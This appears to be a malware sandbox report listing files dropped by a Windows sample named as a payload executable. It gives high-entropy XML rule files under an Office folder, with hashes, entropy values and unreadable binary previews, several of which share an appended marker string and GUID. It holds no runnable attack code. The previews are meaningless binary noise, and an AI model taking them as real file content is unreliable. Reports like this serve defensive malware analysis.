                                                                                                                          SSDEEP:96:45SKHS9jNfAjxbhSklmCF2wmU28ey06rP1/a08gHyJ:aS+aojxbhSkl50U2PVYa08gSJ
                                                                                                                          MD5:A99213A8C77C8372D423A9D6801633EF
                                                                                                                          SHA1:81321929E8AFA205D9C6BFC5EC7F9EB63AF78152
                                                                                                                          SHA-256:AF2D35DF5C29BFE4CE365FC2CE7D945415CACE16E37FEDBF016803C27478AF70
                                                                                                                          SHA-512:158CA984AE9C75B6F40B753A5C211D864B34FBF71A4DCBB7075091609D018208A87846FDA6383713CD0746E40EF5733674BDD6C6691496F9BC4437DDA227EE6E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....i..B...E4;n.}..-).%.c.P.x.OJ`.-..g..=.}.K.Y_.6MZ~......!.3H.GL...Kr.J/...iHx...&:.A....:...Sl.,n~..^.e.&d..4.V.Z.[.....u.....H.G......^!....#.. l........X...9...1...++9..qX.G...=../..<l.t....N..^a..'"B.'(..taf...N..YY.....i......'.Z.u.-C...[8 .jr....c_..re.B..wY..Z.w...y:J...1...nE..:M...@~t.v......g....gr.U..)...q...7-P.Srzi.I...cNM..GIOq.....;W\.C-.o..e....tf!u..YL..s.+H>6.......c.D....E./>2.%..U....ne.c[t8L...J#<sb....v.Q.,..3..2..x...@.@..*....,uP.0......!..2..e.Z.N.1...P.a.TF....Hn...\..n.@.,....T...tc.uc.....cy.fY1v..v......X...*.N..3.lys..4.U1.~. ...q6...".{}.....u.d.U.......u.C.v4!....O..\'.B.....$|a1{W.X."....6...6.+...5..g.0A...!d....-.#...Y..y..&.b.u..1.^....H.x ....t...A..C.n..k^S.}.C..@....4F.....5....EI..z...?......;.X.p.<...!........1..C.^...u..I.......0.>/$w..V...lR^..Z...#K._Y....n.5....Y)..$l.rw..D...{.8.-...B..y.8.P..LG.&....C..w..*....g.....]G.m..fu(.fn7.m.9L.m.wQ.U}.+.rE.6\}.Nl{...vsns" \....g..=..O..........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule12035v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2801
                                                                                                                          Entropy (8bit):7.920482239403042
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:jslxE54v0XiKSXkotpYC5weT8C020OvBs5lu0SYk5s7GVTGBDzMrdg91YXdsXrHK:grteU75wCOOpsvr4sGVSMxgH5bIt
                                                                                                                          MD5:22FEDF302E7BEFFB4A18CB50893CEFD7
                                                                                                                          SHA1:3B11ECEF1E21EE7F1C1E8ABDB83AD7F9C55CEF28
                                                                                                                          SHA-256:9A9940A527EDE97706124B9BAEAC0A9054C6659CDA5C5B42C24AF35829EC2CB2
                                                                                                                          SHA-512:DD446521BA7C8CC923DA420411F79C0F3150AD9227055600511DDB37C6D82ED0AE241288B61236FD2F608938588102D487A060F4BD61DCD615B749E7020FC1A6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.v.k .>......a..{w..<......v.%.}..;...........B."k....).,`...~.c..G..q[3.....D..0...|..."...'.&;...!r..<...\..XNq3.Gnxjn...OP?w.a..c.......Z...).p3......!...%.H....N....8....Iy.d.h.....l.[|;..M.w.lo..z,..?..Z....).sb.o.p0u6.! ;..!.W@..p._.o..}.4.?e..m......|.;hK:.+%.,..~A......v.....=TMb.Y.t....'......'.e Z3.d.u..t......}..y....h.....2k0!B...Tkbc...`M,s.......5`.Q.K..~r7.O]".....?n.0,...7...E0.\6....o3.d.....+.F..k.K...\Y^.~.~...L#C..n.....lMz..+ ..3.O...Q*...5..L......u&bn..'.P.l.Q.$:-..Y..Y,{...>...~Z..:.........`.,..E..d.&..<v..Z.C?..L.r]...w.#{..p.>.......N\..E..\..I...{. $.L0d].6....i..U.h....p..'.Q.p...Z.o..RN...\/5..].,/.R.=.I.....NY.`4..o..l...d..V.{...he...m..u.i...g.....h. ..8.q......aE.FS.g.....dC..I..../a`..k...1............^..l.... ...?./..p...C..e..~zEza..#..... g....8.....1.......\.@.A....#./.^.W.,.'..m:.l.(vB.>(R+.\....Y...OW.,...40.P5A.{.u...7.......z.....T.5q,...M.9..#.OEe.q'I..16.u.@^.....=.{."...h<l'eyfV..*'z..t...l.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120402v21.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4122
                                                                                                                          Entropy (8bit):7.947498306007678
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:ZtOGjtdW61iuvAo3AfMOYyqfAHEZbRgjsrm6sk5bzEqmX/:f9d+uSMO1HEZbijsrORX/
                                                                                                                          MD5:EC0CB86FFE663AD2D67C76E6765F82DE
                                                                                                                          SHA1:E3FAB0F8B6C4F362BA8EC734612F1BF00808C4B6
                                                                                                                          SHA-256:12BFC5C079EAE03387B0C1E330E246B1931765AD2DCF9CE40BEC26AD8BBEF960
                                                                                                                          SHA-512:8D9C4B7B8B5AF974F903C8445ACCDD4A34588D1EBBE4E234396ACA031F72CFE05434F1B9B97A32EB65DBBD9AC2E7C97EB043B652EEF7FE6AF6A5885131234FC4
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?rL.s.zI..-.=m...:O.nW.'g...g..iW.....u:}..\*..z....u...a.+2gU..<....Ae.%.2-..bl.*.........Q..~t..BNN.4..R-..=...@......`..3.W......z.}.M.*...{s.#.L.l..^.....E..=..$. ...........U..N..?.#N........0.p...jE..q....iQ..g!...k.lY.K..n...u....4f..J..%2..."R.Do.gu...Up1_z..`.N.?.......rw....1}5{e.q.....U..H.z^..s]$...K.GU.L..X..OP.....S.U~Z)."..c..B^.t....".5.p..M....|.:.M.y.*..t....o}*.g.$.+..Fd..I.&..e...&|...qc}...$.![.ck]....B..5B...@.........6..2.1..mVh(.b.J.F.xBt=*..q.w......4.....}..J....xC....~.....:y..;;s...D>....f..s...._.]0C....Jp....(.E.(.d.)*...!.JNB0..8....6k.y.4Ef.j..Q..C.#*.".. e....FCU?.2..%.v....3.5)YNx........@o.Z..a..._.w........|._.<|....'......P.`...3....h.Hz.#7.W...31.....QU...w........u,CR.1...:......\.n.G..%..0q.o..$.s._.....y.Fr.>~.5..Ok..k..4.s....N...&=..+"A+(...BA.N..o[..t...rp.D..<5..n,.f...G...]....L.+.E..J^a....'.....E.PP.Y$K...tR....o.C.v..m]....D.......N......$k.{.=..._P...:P.sK...=.|...9.$.v.v.Y?..!.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120600v4.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3314
                                                                                                                          Entropy (8bit):7.934317767105201
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:3H9GVo0Ci5xeRKHEoLKaueZyGt54OkrznhaWGQ56sBHrf0evPm1K2MYp+V+pC197:TboCeZy6krznYWtYmj0Om1K3Yp+VgCj7
                                                                                                                          MD5:A1B961092CD6B1781A984E6DD4744620
                                                                                                                          SHA1:36031AFADD260A4511E8C8163BB70BC64487E88E
                                                                                                                          SHA-256:132BF9AE461283C1D4FD0A1A33EB74EE3A6BF8527085B049020BB5E4AF131BB5
                                                                                                                          SHA-512:CBAA5137779513F166E6F1B6F5CB216DEB5CB9DD2859A6FC44C69A87656284C08CC1A34D156415774D49C220747C9A8091658AD7AF6AAA9DBA575A01CC814757
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?)j&.&.>..G.:...r^..m..Jy..a~J..H....(O1....g.=.7... ..N.';.....g'.....u..'-yb-x...D..!.@'.m3.:m.d..[m.../gt.ZWR7.U.C8SYb..i..Q_8...gl...Py..p?.....w}xe.k.y..X..u\1.......:I.Z.C<.HpD.]T..(.]....~.a`..A..-...\}.....k[Pc....i.l%...F.uN.1.o_7....$...}.g.......D[9M..aURW..(.S..\.(.]..]g.\.n7b[..E..^}1...N..h.`...&Yt.<...C.U):6.II;..^-....R.........G%.F-+....$Q.#.G.,...z."Z.%.4.r^{.._.......D..DG.U..q....%...z`=.........F.....,I....F.!'..*j,Hy..5...Ag*e..)yd...c6N.r....>4.b.........1b..._:..*.!#(....e..~|.+r.....S..$.K@.~......^.T.m.X...S...j$..%.6.*0..@...E/=0..s....k~...O......A..o..|Ad@...%..O..,4n..JQU. a..7.j.E..GT.a.N...y.(.<.......I?..:....RdE&h.Nk.{....._=... ...M.......D.........}Y..4:J....9;...b.<.PQM.../....U......!..<n.M.u$.D7.v.L.]O@........~...C.6..^/U.N...x..Ib.....}$....I.1.n@.kHMe......5.<..U..p;O:..{./.,r..2a?w.i.$..."..!.E.T).....R..}.r. .....;..".}..z:.4S.q....Od.6(]..\\..7...g.[.CQ.fG....3[........{........X.d.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120601v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3676
                                                                                                                          Entropy (8bit):7.95057953067687
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:GTaYuO2FoaIWYneu2gUSRBGlN0urS9OxjxOhQ7xPem3:EtuCneuo1eOxg8h3
                                                                                                                          MD5:9D11F9232A3B0604706E57BB45C97D77
                                                                                                                          SHA1:07312B198AEB244E40E1A65585D65346C9312BE4
                                                                                                                          SHA-256:2A6F6EF93C0300BEEF7E02AECD695409664768F3893051E0CEE3A67F88D4DBBA
                                                                                                                          SHA-512:4131B0C760AE01B1EEDE58BDE80C96085D4A0656199AA4A0077D061522E219FC01D73FA79F648CB430C12C2D4F771D1512388EE985B30E422BD7CAD56CEB324C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?...6....[N.....S......5....#.0*-....5.p..o....I..Y.../.N.`36!ec.>.K...mz.s.h.kH...(e.".K-..7...U.....~....G........(.q.].."..L....'?.K.'..W.;..l^..$....%...$..$i..!..`H.. TM.+...x...m.h|..O...K.D.D9....w..Te.0......z..\A.......fw..6J......Z.i)!Mk..y.....x..F...9.K..I..5.5.U..$...~.)....:.Q.t...f...3.<....6...N..W.2lf.`....2qr..c.H...........y.(AV:..k..].'uzn).{0....e..r1x..e.Z.7.l..F....J..b.h.P..9.....5....|x...\Q+&..?.\...8..[..[.4vkn..............3I.......H.0..~,J=.n........\.y........-...7t.....#F.C..fk...Ac.{<..M@.*+U.......m...m....~M..;..A..C...~.w4&t.w/....4.....r.@.7Ov.n.,ip...3.FM.d.bi+.e.J[t...'.:*n.......L...hq,...&..+D.\?I]..$.zs......?./O._..t]MD.S..E~.j..n..@~...AQ%.~ .A......M%\<...F....x.{....\..>.._....q=.z..V.f...I.......H.5......l.h.W......C.......i.s..s.%...9..&.?.'**).....+.N.@.\........Y.%.....C..y...6.Z..RJ.....Mc..9..U...R.u.wA..R...X..=A....@{KN<.GD..^=..~g,.4..kc.-..T.....bO..}.f..4D..{..g.i.O....o-..|^+x.I|

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120602v8.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2925
                                                                                                                          Entropy (8bit):7.937331112071527
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:rHfZq5rHD+qjyMHXVED7MqKAsHPEB/xT5mqWMAGNQtbsHvypDOLXnJjOTGtJZUxE:rHfZqRaqnVEDQqKA6EB6+35aROLX33UG
                                                                                                                          MD5:7993E5EDF2FF742F9B11A3DAEAC12D01
                                                                                                                          SHA1:2C4902E1E4124FDC6BF039F33B2D2AA2B41360BF
                                                                                                                          SHA-256:5E1C9E683FE747934B0930FEA85D4237C7DC62AD916B0F56C7E96389160B78AD
                                                                                                                          SHA-512:D0F9FABC5F6A8097FF85701631DF648659B047E17D37BE7BE6FCC0E1158DFF31596E58454B2BA73098461D465718DE2376891C0C06CA521FEECEEDCA809F45AA
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.z..'.......:..h8.......I.....SzNt.=A.`v...y|..8...H..=\...T3....r...\..........%..h!>..Q %.w^V..D.v..GN........d.*s.3..E.j.....6..K.....gDd..P."On.....3.).i.....K(s.y.%k.u.....):aAn..oE..x.7..Qs. ..<AnV.....<..p.s.'c...#.K..81R..?.vp...S.=.R.WJRed.Ht..0~.....zUS...............}...z....D..T....?B...$M.4.Z}.{.}...*o/.6.-Z..,W...x.....O..&..T-......L...E...%.3....Kf.nC(6..|../o....$..]M"N<.PZ..8...O..s.&..q...ay......uga.b..g...A...Ic...D.D...[5.vB.Jm?..h.z|.?....'.8...4.44!....i|n.7.......b....P.... ^..k|..fi..w..f.......En..[.m..j.1.]......X....-*.=....".ebV`7L.....2..U.1...$.s#.3...'.([..idt......J.*.....=F/.......3..&.u.....a..y.a...S.n...g.V...j..4.{.CjE........76.2...Im.=..{<.L.....u_Oi....l.U.m...+...&..u.=..R...d.Fq.iG..N..:...P+\.......Q..fo...=3/.$..s.wS.;.....=....^..C.S....>.x........Q.SQ~...*?V.n...../~.s.i.b....;.'50cjk']........&.Y........>...b../MO..."....^..U`*..]..@..4D........g..mt....A...<z..4-0...u...D..v..2#....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120603v8.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2462
                                                                                                                          Entropy (8bit):7.919798335691319
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:SsXHgtW9Ta6YsoAsBCVE0+5ZkbZhjESue4F/QGnj0jU8P0/yGiD:xXgc9e6YglVE0+5YZxEW4R4U5qx
                                                                                                                          MD5:D3D83DE21070DF307CB8BA0C45227705
                                                                                                                          SHA1:2667B08BD3DCCDDA012AE31E180DE07CB7CE0048
                                                                                                                          SHA-256:0EF82F3C2925FB06D731BADD4C562699FC8D1A5B28C17D0F558B5DEBACDEB3D1
                                                                                                                          SHA-512:30DEDF014130364EFA3F4CEA5A3BE9F132E6683F0F2CA1D00E8A2E3F3F2DC05745B5D5FC5DF440BB00AD559DEA5EE7B50647CCFC4163EFA87B28A1D0571E4AEC
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?;Db:...?..4.).{..w.Gk...w=.,..1......b"...<.....Ge......$t2.k..b.K..O..~4...fK.Bf.1[C...i..o+....w=.-.Y.\. )...b...~.%...T.G./.....Q.V..`.XI..t.[O.-..f.)5...-.|..\.+#6.. .o..c.$.....t...?7ft.LA....=2..WD.nV.X...Z..:)g..H....7.^..*..g/.m?.v.S4F[.:D7...6....p......&...6.../....... ..........OL....^.?....t.+z..b5D&..9..^03.....B.y..h>..g_..<~.........-.-...v.../......&.R...)..?Vg...6....`b..]...rm...[.....X.Z.dk.'pL-.1.F#."..u....|...g".....2...A.d..1..k.=.t2LRm...cLA..}nqT{.b....e..8M@.6.....]..zh.5)t....=.fj.....O.!..9.....T.....t.1......R.u.....#'...e.M.f.N..10.t...p.4.=...>....a.N..).6.p.O{..6.7s..J.f....+#..V...*)$...c.......j.2."........Y.).......Y...MD..hw9K.l'.L!.......s.o[*......s..5....?.J..o.u.H.P.....P.?...w....Q...C... .g....`.^......!.IU.s.xd..f.{^(.e.rn..,}...K...=.k.e.I....8F.k..s@.*....y.W1..].Qq.....P....:y..<.(...S..Z..dY.\....iR^zw7.D.~{..*<}9...C^,.z...b.b...p...ji2..>u..>u(.....H$..O.m.%=`W..-....R.B

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120607v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):538
                                                                                                                          Entropy (8bit):7.594812519963166
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:ou7lLb5FnOgZv3M/M1i3cSSp2aaq5bTcii9a:oYlLbyhcSy2ybD
                                                                                                                          MD5:9C9918A135E62EEA3663EF4617E049DA
                                                                                                                          SHA1:D3D18FA9BD30F97C35D7D786EACAA653C66939AE
                                                                                                                          SHA-256:02C0C129BD118C1A089D8AB44E890FFF9438A97DD016F5529FE4845F93CC1A26
                                                                                                                          SHA-512:60199803BDF3FC05153ED4A5EFB1A0F914BBCCF71A1E7F5EF6B234F8C5300484C1403DB51CAB8780DCC01CB7709FDA71EA5E91D172218CB398CE7C540C7EB48B
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?q.....n..V.:...E....}:Bz.W}v2...0....../..Q.Q.L.......].....7......l...b..-..D.@..Z%.9.[..{.J.Ja.p...!1.}.[s..BW...m..C..../):..d....1.<..'..x'.Q\..se..N...S...%.A.e.r......X;......Ri?.c.i...Y.x.F...TP1G........,.].Y...)...0..B..r.&mwt.<s%.G/u....I.'^....`/./^.]...=.Z..,i...\q*F..N..!.a.5?.1V.*U.....g~6..A..A...|=...#&<...e."@.j..-.=R...p..7V.......'TFc...S.1.....c{1=.6.[.6,r...U.irJ.Y...(r.W(f.J-M.n...h.*.....4!.x........phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120608v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2494
                                                                                                                          Entropy (8bit):7.929363302003387
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:bOoJedzvGh1MXnkYk0+YmZ4gtukE+Ifs4FLopYc9h5PEYA28D:bOVdrGzMXfsYk4gUUIHFLopYcb5cS4
                                                                                                                          MD5:A1C1584AF0E708E2E344642E0AF86BB9
                                                                                                                          SHA1:C6282AD2556F09D386420A18DE7ECD8BC6BD406E
                                                                                                                          SHA-256:E555534664A06E49D143261A54706A98ECFDC1941FC6B4E686C27ECC8370518F
                                                                                                                          SHA-512:C9E08D1DE87232E2EA4CEEF0C0ADB9AA38DAC16CC39A195F7ADB871D990AB92DA57D4E39B1E9A6A6B6B1AC0961EEED8A163C4E718DFF0373054C2D8A4CEA6FEE
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<? ....}.....Y/T.o.j.......'.5..d.ic.V2..}w...6...t..g .`;.^..:......5...F...<e).$..0./\...x..b...1.....OS8.v.g..b._*........B.IY.GG.....K......I.Y....m@.>.?....@...u..>....~.c.b...~..IG.Zwg}.#.....wsP....`3.(i..D.Efd.s...#Q~..#...../....`...m|a...R...!...6...^^.}.i....?.%|..., Z..}.5"..A..ovy......?o.C.?u.7.~.zA...VG^.q..t.(.....6$.ic..3R.A......n.K.y...w.-..s....7...f[.....V@O..^..:.'*..."......,....NQ.A..!.....lJ.U(.\"...c".N.qQb?A|.Q}.e.%J....5IC_.....\l....G...N>7..{....Pw1DSS~..4.q!......h:.c..lq.......G.".....Y..Z...],....?.a,.l.(.....^.)...4T#d.Sf.L$..Zg...r.Te,0n..ig...@...M..-..n2.-!...'.|W.\b$V..."'....9...^.%..c.....+U..M..RO.$^.).........L.9.s.l.3....l.,......F...f.Pi.jgY3..5.g.T..6.8bS.l.......k..V...P..$......./...b[5....)O:.${>..,.A..r.+..K...../...P..-..~....-j`=.~.V.K....a...n..f.d.K.G.G#>Z..&...U..@.P.Eo..S......G..o.~n$....=i..P..To...t...C8..1.VU....V.0.E......E.c...>.T.R...V.......V..?|.k.....g./e....].@.J..v.M..y...P...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120609v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):742
                                                                                                                          Entropy (8bit):7.680559320972593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:3w1bwjumt7M+VyU1WEVAk8TtTmQnD9qqPzgza2hKP/j/Ld/VkbkXyq5bTcii9a:3w1bgNgCyU1renD9Vrgza2SPdqkXXbD
                                                                                                                          MD5:599AD764880F45F388AD366F7768BFBC
                                                                                                                          SHA1:D966A142855FB6D57CD23FF25D7BF34DBE06C454
                                                                                                                          SHA-256:000D5579D9889E44B9F8A7FBDBE2E7C2D50EF3C846F45CF5E317D00411AA26BA
                                                                                                                          SHA-512:2C3D246C226C56F59730A93832892D17FD623C3C5B9F14E4AE75A2C93763FA25CB1D625B9D77F32593EC0B7EDD6C2E86F62098CB51A7ECC23312C02CB557BD8D
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?E+....w6..hb....^7....@OC4.....rC..*..:..+..... .{7...l&.>x.$....M.y.[.`.........^1....8....u....T.y.s.B.....k...<ACr....h^)..5..v^..il.FKZ...a......c.!e...0..8..B......Jv..t,.w..C.*R.H..Rp...@........6.GF.+...)45."!...1...Z..&.]...A.H.c....k..&.............a.3j....b.....?.t.......[...hT.....6.U|..AR..o9^...+.."..;.X....D...S7N.q/e`...H.A.S.1....*....x....Jt.+..a.!r.r..&...-..~<...+:..0.e=P.'..{..rG.U.G......E..C}a..$.!.k....H1.....m@.3l59.....mOF.W.Q.C|+..Y.3.6.lk#V2. 6T.L...>.(V..`$.d..b..>........1.$b4.$........|....s...\)i..{.FK..........[.y.G.....s.......IV..|.xZ/...^3......-d....}.../j.+.._....../..^.r.../ ..m...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120610v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):808
                                                                                                                          Entropy (8bit):7.735805437847448
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:YXYQ5pSaFblZGu6ewKrVkI+u0qMfjYbr3wAgxFBqTW3hZNSziZQBpSC9vLq5bTcq:AYQ5QaxDR6BKBMcGLAgLBqThidCAbD
                                                                                                                          MD5:4308D257913F5F776BC6089FDC8CA01F
                                                                                                                          SHA1:9033935BEAC4E53E78FFD8FFA61A23134F283630
                                                                                                                          SHA-256:3DD894B14F2FF025C9230C3B21C0D34BB1E552693545E1AFB7DBBBE902C50508
                                                                                                                          SHA-512:0772ABFE5282DC3F1E133AC67C5DEEA2322FB186900D082287BA51485F2B0EE993C7D6E9754C13D0F97AE5BC95CEC5DA01B0EC8C7BCAFC425A5C2BB3509EE33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?9...f,.! 6._R..#.!(....m.M..Z$.&..M......hvp.K.....!`.....Q~..c.N?.7.m...S.m.b.5.X....;..c.A..Q{ ..g.;..01T'..R.....(..1.5...A...h.vd}#"B.)K;.vZL.".. .oV..#......]....nZ....GH6H$.R.....$p./.b.f.C....0f_0..L.i.N...x{.......Z.q.D.4EN. ....j...1.A0.wz.dVQ~....]..@.F..]..^..M..C.P@..,n{.5X.E.f!|...F..r..9..>I....Z....C.8...`u...a.^....6.....\.._Y...u6.q......(s..&.....&T..N....A..A7@.. LGT.2...%oL4..a..:.Zc...\.-c..]o......9[H.`..'...CX..j.._V:_. o...0C..=.y......^6...u...?............XA...{..,$......Q!..w..[....H.....V`........J.$..#..L....f.4.$..3w...J.A..2.~\@(.......l.^.B...b..UI+...]~}.R.'.j.(..N.k.v.A............$.. =K#.0NG...O*o..5J9<.MDu.h..D./..k.OR#.W....r...).....3.N.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120611v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):749
                                                                                                                          Entropy (8bit):7.7444902318382285
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:Nz0mYDAfNU9nr2+m1au/qhxpnuqsfGTEA6e29cJh8tdmkBXQk8LfYyzq5bTcii9a:Nw0VUR2+HAJfoF6e22Jh8vhXl8L8bD
                                                                                                                          MD5:66416616B497F9C247F1564A429F768B
                                                                                                                          SHA1:B8EB06221721E391CB71AA8789FC6172597D27C4
                                                                                                                          SHA-256:910BFAEF21B53A8ED979AD807D6761CE686CFD5589EABEF5D772FB1AF1FB836B
                                                                                                                          SHA-512:72FA3C6056D3BCAB0AEAF3B0E86B22CF2FC2F471D3449E5C5E6BB1D0E96FF4243292E39E35AA69B910F5935709C21F35EDBF78139A47203D96B9C47BBFB602AF
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<? N.KEV...r.+....^.X.$.Q..F.Y.......k...~2..K.....k/..Q$PMqb8..<......o4C...8&..9.p...n....... ....A......Mj..R.9h.u.z.....9.0.q[......w.mB..*.....O...M<.t..s.........JjI.I.K.....;pXa..q....6.X(.z..G...2..&.r....W..!}.+M.K}R..W....5/@.].!:...[.....D..#F.O*....".)1...*.\w..^..yZ.?SsS.J|W..x..=P^.t..cC}..2..o..w......J.....k....^V..H0....Cv...2....P...C.Mm.j.E.>..+YE.....at..M...,...g8....A}....V!....,..h.A.z.y.7..<5.. .9.].............P...........U'<o....A.v....)..^^.D\..]...r.o.......z#..x......G..Qw%A.x`..5.u.te\.~~.b.L.0a..K...B.l.%.%..3.eC.#d..ET....._j.J..6.3c...W,.ln..JLH.......1..O...=.?...NW"H......I......P5.7phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120612v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):805
                                                                                                                          Entropy (8bit):7.768654424771258
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:xu93DCTmpr/T5xGmb848WNEMLd4wCzNfSbD:09WqZ/if4vNEMLd45zGD
                                                                                                                          MD5:E7B673EC54B5ECEAC5EA1DDED0B20E03
                                                                                                                          SHA1:A3B0801441063110A9A7F4D54FE523E2AB675E9E
                                                                                                                          SHA-256:28D6CE63878451B0B548EE1D906E65477048216BC55FFD440EB2BFDF2B1C7638
                                                                                                                          SHA-512:82D2F8DDB71542FE77D684EAA0DC7A025B5B634A9CE211DC6C4D50B462B387A6EB3BD91A94FA2782D863FE738BAE97C4BAF2A7D0A8DF6B77044B340C45B16493
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?;GO.x....u...=`;...x...X.)..;H...5o..y....X...M.bu.giY.n.....T.>...C.....%H..Yu...sph...r..T.~0. ..w......B...ryTJ..N...U..2.+cv.0.......d..1.z..l..D.2G.#.k.6..u<...#.....-7.F.Nb..........ud>.....!p...z^.!Q.T)..X.~f..._/8.|Z...lF.{.r..`,.....}....@w=....3..Sk...?.r.m+..E....G.N...!....edO...f;....@.... 6...g..!||6J.;..$..M\..E.........g'...X.\..E.`j(.#......Fi.{65.gFs]...r,....m.(x.<Q....D.(....9S..G..<@.$.0....[b.<..Q.....%.3Y.."...M..N...*.R.:.._....X.!. .Hq.e.U.m....W....f@...*.x.. .w_.gW......L.-.....o....{...F...\#.....Z..%.k...UY).........FvfgKmS../..%......8.d...=..?.;q...3d......r..J..a.KS.=.......:._p...]Qr2tZ...GIq..y..$....~.....1uBS.E..\z.{...w#.H....JCAphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120613v0.xml

                                                                                                                          Download File
